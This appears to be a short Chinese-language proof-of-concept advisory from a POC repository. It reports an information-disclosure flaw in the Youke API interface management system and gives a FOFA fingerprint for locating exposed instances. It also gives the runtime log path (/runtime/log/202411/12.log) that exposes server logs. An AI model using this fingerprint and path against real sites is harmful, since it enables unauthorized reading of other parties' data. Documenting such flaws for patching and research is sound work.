POC/wpoc/优客API接口管理系统/优客API接口管理系统存在信息泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

30 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 优客API接口管理系统存在信息泄露漏洞
# 一、漏洞简介
优客API接口管理系统内置30+API接口支持服务器信息网站ICP备案抖音无水印QQ在线状态QQ头像获取历史上的今天IP签名档ICO站标获随机动漫图网站标题获取爱站权重获取城市天气获取随机一言皮皮虾无水印每日Bing壁纸垃圾分类查询手机号归属地申通快递查询等接口功能。优客API接口管理系统存在信息泄露漏洞
# 二、影响版本
+ 优客API接口管理系统
# 三、资产测绘
+ fofa
```plain
"public/static/index/css/flaghome.css"
```
+ 特征
![1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab.png](./img/h0O5SDzmZG9iW3Ie/1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab-181220.png)
# 四、漏洞复现
```plain
/runtime/log/202411/12.log
```
![1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb.png](./img/h0O5SDzmZG9iW3Ie/1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb-694826.png)
> 更新: 2024-11-27 10:00:07
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ptvdeuz7cchr75g8>